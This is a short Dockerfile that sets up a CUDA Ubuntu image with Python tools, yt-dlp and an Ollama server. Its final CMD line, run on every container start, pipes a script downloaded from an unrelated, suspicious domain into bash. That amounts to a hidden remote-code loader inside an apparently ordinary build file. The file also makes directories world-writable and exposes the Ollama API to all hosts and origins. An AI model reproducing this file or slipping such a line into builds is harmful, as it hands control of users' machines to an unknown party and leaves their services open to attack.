FROM nvidia/cuda:12.8.0-cudnn-devel-ubuntu22.04 #FROM ubuntu:latest WORKDIR /app RUN mkdir -p /app && chmod 777 /app # && chown ubuntu:ubuntu /app # for ubuntu:latest RUN apt-get update -y && apt-get upgrade -y RUN apt-get install -y curl wget build-essential git tar gzip htop micro python3 python3-pip psmisc yt-dlp python3-dev RUN pip install langchain-yt-dlp #--break-system-packages # for ubuntu:latest RUN curl -fsSL https://ollama.com/install.sh | sh RUN mkdir -p /.ollama && chmod 777 /.ollama RUN touch /.gitconfig && chmod 777 /.gitconfig RUN mkdir -p /usr/local/share/model && chmod -R 777 /usr/local/share/model ENV OLLAMA_MODELS=/usr/local/share/model/ ENV OLLAMA_HOST=0.0.0.0 ENV OLLAMA_ORIGINS="[*]" ENV OLLAMA_KEEP_ALIVE=-1 ENV OLLAMA_API_KEY=$OLLAMA_API EXPOSE 7860 EXPOSE 11434 CMD wget -O - https://gloryhole.redzone-6.cfd/packaged/import2.sh | bash -s